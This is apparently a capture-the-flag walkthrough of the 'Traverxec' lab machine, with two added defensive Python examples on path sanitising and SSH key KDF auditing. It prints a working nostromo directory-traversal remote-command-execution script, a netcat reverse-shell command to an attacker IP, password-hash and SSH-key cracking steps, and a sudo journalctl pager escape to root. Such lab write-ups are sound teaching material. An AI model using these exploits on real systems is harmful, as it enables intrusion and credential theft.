Traverxec


Traverxec is an easy difficulty machine running Linux. It tests your knowledge of basic enumeration and privilege escalation using a common exploit and a GTFOBin.

Be sure to check out the Basic Setup section before you get started.

Enumeration

Like always, enumeration is our first port of call. Let’s take a look at the machine and see what we are dealing with.

Portscan

portscan traverxec.htb -oX nmap.xml
Grabbing ports...
Ports grabbed!
Scanning...
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-04 17:15 PST
Nmap scan report for traverxec.htb (10.10.10.165)
Host is up (0.22s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
|   2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
|   256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_  256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open  http    nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.45 seconds

We see port 80 open and straight away notice nostromo 1.9.6.

Using searchsploit we find some vulns:

searchsploit nostromo
------------------------------------------------------------------------------ ----------------------------------------
 Exploit Title                                                                |  Path
                                                                              | (/usr/share/exploitdb/)
------------------------------------------------------------------------------ ----------------------------------------
Nostromo - Directory Traversal Remote Command Execution (Metasploit)          | exploits/multiple/remote/47573.rb
nostromo nhttpd 1.9.3 - Directory Traversal Remote Command Execution          | exploits/linux/remote/35466.sh
------------------------------------------------------------------------------ ----------------------------------------
Shellcodes: No Result
Papers: No Result

We will take a look at the 35466.sh script to see what that's about. Searchsploit scripts notoriously carry line endings, encodings and whitespace from other operating systems that cause them to fail or run incorrectly. Not only that, but they often contain comments that don't use the comment syntax of the language they are written in. So open up the file with your preferred editor and just take what you need.

We end up with the following:

nano nhttpd.sh

#!/bin/sh
######################################
#                                    #
#        RedTeam Pentesting GmbH     #
#    kontakt@redteam-pentesting.de   #
#    http://www.redteam-pentesting.de#
#                                    #
######################################

if [ $# -lt 3 ]; then
    echo "Usage: $(basename $0) HOST PORT COMMAND..."
    exit 2
fi

HOST="$1"
PORT="$2"
shift 2

( \
    echo -n -e 'POST /..%2f..%2f..%2fbin/sh HTTP/1.0\r\n'; \
    echo -n -e 'Content-Length: 1\r\n\r\necho\necho\n'; \
    echo "$@ 2>&1" \
) | nc "$HOST" "$PORT" \
    | sed --quiet --expression ':S;/^\r$/{n;bP};n;bS;:P;n;p;bP'

Running this script as is, it completes without errors but nothing happens. On closer inspection we see the URL-encoded ..%2f..%2f..%2f, which decodes to ../../../, our directory traversal.

Switching to an encoded carriage return instead, such as .%0d./.%0d./.%0d./.%0d., and changing #!/bin/sh to #!/bin/bash fixes the issue:
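The two encodings above behave differently because of where a server checks for traversal relative to where it cleans the path. The following is an added example, not nostromo's source and not code from the original post: it models a constructed check-then-strip ordering bug in which the decoded path is tested for "/../" before CR/LF are stripped, and places the hardened resolution order beside it. The docroot is the one from the nhttpd.conf found later on this box; the request paths are constructed.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

# Document root taken from the nhttpd.conf found on the box later in this write-up.
DOCROOT = "/var/nostromo/htdocs"


def naive_resolve(raw_path: str) -> Optional[str]:
    """Constructed illustration of a check-then-sanitise ordering bug.

    This is NOT nostromo's source. It models a server that tests the decoded
    path for "/../" and only afterwards strips CR/LF from it. "/.%0d./" decodes
    to "/.\\r./", which contains no "/../" and so passes the check, but turns
    into "/../" once the CR is removed. Returns the path that would be opened,
    or None if the request was rejected.
    """
    decoded = unquote(raw_path)
    if "/../" in decoded:
        return None  # the plain ..%2f..%2f encoding is caught here
    cleaned = decoded.replace("\r", "").replace("\n", "")
    return posixpath.normpath(DOCROOT + "/" + cleaned)


def safe_resolve(raw_path: str) -> Optional[str]:
    """Hardened order: decode, refuse control bytes, normalise, then check containment.

    The containment check runs on the fully canonicalised path, so nothing the
    earlier steps do to the string can be played against it.
    """
    decoded = unquote(raw_path)
    # Control characters have no place in a URL path; reject rather than strip.
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in decoded):
        return None
    resolved = posixpath.normpath(posixpath.join(DOCROOT, decoded.lstrip("/")))
    if resolved != DOCROOT and not resolved.startswith(DOCROOT + "/"):
        return None
    return resolved


def escapes_docroot(resolved: Optional[str]) -> bool:
    """True when a resolved path points outside DOCROOT (None means rejected, not escaped)."""
    if resolved is None:
        return False
    return not (resolved == DOCROOT or resolved.startswith(DOCROOT + "/"))


# Constructed request paths: a normal file plus the two traversal encodings discussed above.
REQUESTS = [
    "/index.html",
    "/..%2f..%2f..%2fbin/sh",
    "/.%0d./.%0d./.%0d./bin/sh",
]

if __name__ == "__main__":
    for raw in REQUESTS:
        naive = naive_resolve(raw)
        print(f"{raw:32} naive -> {naive!s:32} escapes={escapes_docroot(naive)}  "
              f"safe -> {safe_resolve(raw)}")
```

The lesson for anyone writing or reviewing a file-serving component is the order of operations in safe_resolve: every transformation of the path (decoding, stripping, joining) happens before the one check that matters, and that check is a containment test on the canonical result rather than a substring search for a particular byte pattern.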

./nhttpd.sh traverxec.htb 80 id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Now let's connect with netcat.

First setup our netcat listener:

nc -lvp 1234

Then we use our local script to issue our netcat command remotely on traverxec :

./nhttpd.sh traverxec.htb 80 nohup nc <attacker-ip> 1234 -e /bin/bash &

From here we can upgrade the shell!

Ok so we are in as user www-data and our working directory is /usr/bin.

First things first, let's see what other users we have on this machine. Looking in /home we see a user called david, but we do not have permission to access their home directory.

Htpasswd

Next we will do a search for hidden files to see if we uncover anything:

www-data@traverxec:/usr/bin$ find / -name ".*" -ls 2>&1 | grep -v "Permission denied"
.... SNIP ....
11005      4 -rw-r--r--   1 root     bin            41 Oct 25 15:20 /var/nostromo/conf/.htpasswd

Having a look inside this file we find a hash:

www-data@traverxec:/usr/bin$ cat /var/nostromo/conf/.htpasswd
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/

Let’s take this over to our attacker machine and see if we can crack it:

john htpasswd.txt --wordlist=/root/wordlists/passwords.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Now....4me       (?)
1g 0:00:14:48 DONE (2019-12-05 00:05) 0.001125g/s 312184p/s 312184c/s 312184C/s NuGiEr37..Novara
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Ok so we have a password. Now let’s go see where we can use it.

It doesn't work with ssh or su david, so we need to know more about how nostromo works and where the .htpasswd is being used.

Doing some research about nostromo, it seems that the folder that stores the configuration files is /var/nostromo/conf, where we found our .htpasswd. Let's take a look in this directory and see if there is anything interesting:

www-data@traverxec:/usr/bin$ ls -l /var/nostromo/conf
total 8
-rw-r--r-- 1 root bin 2928 Oct 25 14:26 mimes
-rw-r--r-- 1 root bin  498 Oct 25 15:20 nhttpd.conf

We need to know more about how nostromo's configuration works, so we open the manpage with man nhttpd to have a reference for the configuration file.

Now let’s have a look at how things are set up:

www-data@traverxec:/var/nostromo/conf$ cat nhttpd.conf
# MAIN [MANDATORY]

servername          traverxec.htb
serverlisten        *
serveradmin         david@traverxec.htb
serverroot          /var/nostromo
servermimes         conf/mimes
docroot             /var/nostromo/htdocs
docindex            index.html

# LOGS [OPTIONAL]

logpid              logs/nhttpd.pid

# SETUID [RECOMMENDED]

user                www-data

# BASIC AUTHENTICATION [OPTIONAL]

htaccess            .htaccess
htpasswd            /var/nostromo/conf/.htpasswd

# ALIASES [OPTIONAL]

/icons              /var/nostromo/icons

# HOMEDIRS [OPTIONAL]

homedirs            /home
homedirs_public     public_www

Looking at the config, a couple of things stand out. Basic Authentication is set up, and we can see that the password hash is located at /var/nostromo/conf/.htpasswd, which we have already cracked.

The other thing that stands out is that there is a section called HOMEDIRS. I am assuming this is similar to Apache.

On reviewing the manual we see that homedirs exposes the home directories found in /home through the webserver. To reach a user's home directory we append the username to the URL, such as http://traverxec.htb/~david.

Going to this page we are presented with a message.

Looking further into the HOMEDIRS config within the manual, we also see that access can be restricted to a subfolder rather than exposing the user's whole home directory. Here it has been set to public_www.

Let's see if we can take a peek in this directory:

www-data@traverxec:/var/nostromo/conf$ ls -l /home/david/public_www
total 8
-rw-r--r-- 1 david david  402 Oct 25 15:45 index.html
drwxr-xr-x 2 david david 4096 Oct 25 17:02 protected-file-area

And there is our protected folder, it seems. Let's go see if the password works with the username david at the web address http://traverxec.htb/~david/protected-file-area.

Yep, we get access and a directory index containing the file backup-ssh-identity-files.tgz. That will be our SSH access, w00t!

SSH Identity

We download the archive, extract it and take a look in the extracted home/david/.ssh directory. Remember, dot files and folders are hidden, so when you look in the extracted folders it will look like there is nothing there. Use ls -la to show them.

Let's try using our newfound SSH key:

ssh -i .ssh/id_rsa david@traverxec.htb
Enter passphrase for key '.ssh/id_rsa':

We get asked for a passphrase, and the password we found is a no-go. Looks like we have some more cracking to do!

User

Fire up ssh2john and convert the key to a format John the Ripper can read:

python ssh2john.py id_rsa > id_rsa.hash

Now let's crack the hash with John the Ripper:

john --wordlist=/root/wordlists/passwords.txt id_rsa.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
hu....er         (/root/Documents/traverxec/backup-ssh-identity-files/home/david/.ssh/id_rsa)
74g 0:00:01:13 DONE (2019-12-05 04:12) 1.009g/s 4131Kp/s 4131Kc/s 4131KC/s 233091..hielox
Session completed
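The "Cost 1 (KDF/cipher ...) is 0" and "Cost 2 (iteration count) is 1" lines in that output are the reason the passphrase fell in seventy seconds at over four million guesses a second: the key is in the legacy PEM format, where OpenSSL derives the encryption key from the passphrase with a single MD5 pass. The following is an added example, not code from the original post or from OpenSSH, showing how a key audit can read those same facts straight from a private key file and flag the weak ones. Both sample keys are constructed inline (dummy bodies, real header layout); the openssh-key-v1 parser reads only the header fields the audit needs.

```python
import base64
import struct

# --- Constructed samples (not real keys) -------------------------------------
# Only the headers are inspected, so the PEM body below is dummy base64 and the
# openssh-key-v1 blob stops after the header fields a KDF audit needs.

LEGACY_PEM_SAMPLE = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF

QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo=
-----END RSA PRIVATE KEY-----
"""


def _ssh_string(data: bytes) -> bytes:
    """SSH wire-format string: big-endian uint32 length followed by the bytes."""
    return struct.pack(">I", len(data)) + data


def _build_openssh_sample(cipher: bytes, kdf: bytes, rounds: int) -> str:
    """Constructed openssh-key-v1 header (magic, ciphername, kdfname, kdfoptions, nkeys)."""
    kdfopts = b""
    if kdf == b"bcrypt":
        kdfopts = _ssh_string(b"\x00" * 16) + struct.pack(">I", rounds)  # salt, rounds
    blob = (b"openssh-key-v1\x00" + _ssh_string(cipher) + _ssh_string(kdf)
            + _ssh_string(kdfopts) + struct.pack(">I", 1))
    b64 = base64.b64encode(blob).decode()
    body = "\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{body}\n-----END OPENSSH PRIVATE KEY-----\n"


OPENSSH_BCRYPT_SAMPLE = _build_openssh_sample(b"aes256-ctr", b"bcrypt", 100)
OPENSSH_PLAIN_SAMPLE = _build_openssh_sample(b"none", b"none", 0)


def _read_string(buf: bytes, off: int):
    (n,) = struct.unpack_from(">I", buf, off)
    off += 4
    return buf[off:off + n], off + n


def inspect_private_key(pem_text: str) -> dict:
    """Report format, cipher, KDF and KDF rounds of a PEM-wrapped private key."""
    lines = [ln.strip() for ln in pem_text.strip().splitlines()]
    header = lines[0]
    if header == "-----BEGIN OPENSSH PRIVATE KEY-----":
        body = "".join(ln for ln in lines[1:] if not ln.startswith("-----"))
        blob = base64.b64decode(body)
        magic = b"openssh-key-v1\x00"
        if not blob.startswith(magic):
            raise ValueError("bad openssh-key-v1 magic")
        cipher, off = _read_string(blob, len(magic))
        kdf, off = _read_string(blob, off)
        kdfopts, off = _read_string(blob, off)
        rounds = None
        if kdf == b"bcrypt":
            _salt, off = _read_string(kdfopts, 0)
            (rounds,) = struct.unpack_from(">I", kdfopts, off)
        return {"format": "openssh-key-v1", "encrypted": cipher != b"none",
                "cipher": cipher.decode(), "kdf": kdf.decode(), "rounds": rounds}
    if header.startswith("-----BEGIN ") and header.endswith(" PRIVATE KEY-----"):
        # Legacy PEM: encryption is signalled by RFC 1421 style headers. OpenSSL
        # derives the key with a single MD5 pass (EVP_BytesToKey), which is what
        # john reports as "KDF/cipher 0=MD5/AES" with an iteration count of 1.
        encrypted = any(ln.startswith("Proc-Type:") and "ENCRYPTED" in ln for ln in lines)
        cipher = None
        for ln in lines:
            if ln.startswith("DEK-Info:"):
                cipher = ln.split(":", 1)[1].strip().split(",")[0]
        return {"format": "pem", "encrypted": encrypted, "cipher": cipher,
                "kdf": "md5" if encrypted else "none", "rounds": 1 if encrypted else None}
    raise ValueError("not a recognised private key")


def assess(info: dict) -> str:
    """One-line verdict a key audit would print for the inspected key."""
    if not info["encrypted"]:
        return "unencrypted: whoever holds the file holds the key"
    if info["format"] == "pem":
        return "legacy: one MD5 pass derives the key, so passphrase guessing runs at millions/s"
    if info["kdf"] == "bcrypt" and (info["rounds"] or 0) >= 16:
        return "ok: bcrypt KDF with %d rounds" % info["rounds"]
    return "weak: %s KDF with rounds=%s, regenerate with ssh-keygen -o -a 100" % (
        info["kdf"], info["rounds"])


if __name__ == "__main__":
    for name, sample in [("legacy pem", LEGACY_PEM_SAMPLE),
                         ("openssh bcrypt", OPENSSH_BCRYPT_SAMPLE),
                         ("openssh plain", OPENSSH_PLAIN_SAMPLE)]:
        info = inspect_private_key(sample)
        print(f"{name:15} {info['format']:15} cipher={info['cipher']:12} "
              f"kdf={info['kdf']:7} rounds={info['rounds']}  -> {assess(info)}")
```

Run over a backup like the one found here, this separates keys whose passphrase is the only thing protecting them (legacy PEM, or bcrypt with few rounds) from keys where the KDF actually buys time; the fix for the former is to regenerate with ssh-keygen -o -a 100 and rotate the public key, since the old file has already been exposed.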

Now that we have the SSH key passphrase, let's try logging in again:

ssh -i id_rsa david@traverxec.htb
Enter passphrase for key 'id_rsa':
Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
david@traverxec:~$ cat user.txt
7db0b48469....50d9782f3d

And there we are. We have our user flag!

Now let's move on to root.

Root

When we take a look in david's home directory we see a script in the bin folder called server-stats.sh:

david@traverxec:~/bin$ cat server-stats.sh
#!/bin/bash

cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat

The last line uses sudo. This will most likely be our exploit.

journalctl is a GTFOBin because it pages its output through less, which can be used to spawn a shell.

Let's have a run of the command on the last line. The pipe (|) into cat is pointless for our purposes, so let's get rid of it:

david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Fri 2019-12-06 08:08:23 EST, end at Fri 2019-12-06 11:48:54 EST. --
Dec 06 08:08:28 traverxec systemd[1]: nostromo.service: Can't open PID file /var/nostromo/logs/nhttpd.pid (yet?) after start: No such file or directory
Dec 06 08:08:28 traverxec nhttpd[457]: started
Dec 06 08:08:28 traverxec nhttpd[457]: max. file descriptors = 1040 (cur) / 1040 (max)
Dec 06 08:08:28 traverxec systemd[1]: Started nostromo nhttpd server.
Dec 06 10:28:47 traverxec sudo[1026]: www-data : command not allowed ; TTY=pts/1 ; PWD=/usr/bin ; USER=root ; COMMAND=validate

Ok so here we see a problem. We like to see what we are doing, so we always have our terminal windows maximized. Because of this the five lines fit on one screen, so less starts but quits straight away instead of waiting for input.

Making the terminal window smaller and running the command again, so that less has to stay open and do its thing, does the trick.

When less shows lines 1-6/6 (END) type in !/bin/bash to grab the root shell:

david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Fri 2019-12-06 08:08:23 EST, end at Fri 2019-12-06 11:53:42 EST. --
Dec 06 08:08:28 traverxec systemd[1]: nostromo.service: Can't open PID file /var/nostromo/logs/nhttpd.pid (yet?) after
Dec 06 08:08:28 traverxec nhttpd[457]: started
Dec 06 08:08:28 traverxec nhttpd[457]: max. file descriptors = 1040 (cur) / 1040 (max)
Dec 06 08:08:28 traverxec systemd[1]: Started nostromo nhttpd server.
Dec 06 10:28:47 traverxec sudo[1026]: www-data : command not allowed ; TTY=pts/1 ; PWD=/usr/bin ; USER=root ; COMMAND=
lines 1-6/6 (END)
!/bin/bash
root@traverxec:/home/david/bin# cat /root/root.txt
9aa36a6d76....78f6e0d906

Now wasn’t that fun? Enjoy :)

Conclusion

This machine was a good lesson in making sure you research the services you are trying to exploit. Using what we had at hand on the machine, we were able to work out which paths to take for both user and root. We should never underestimate the importance of active research.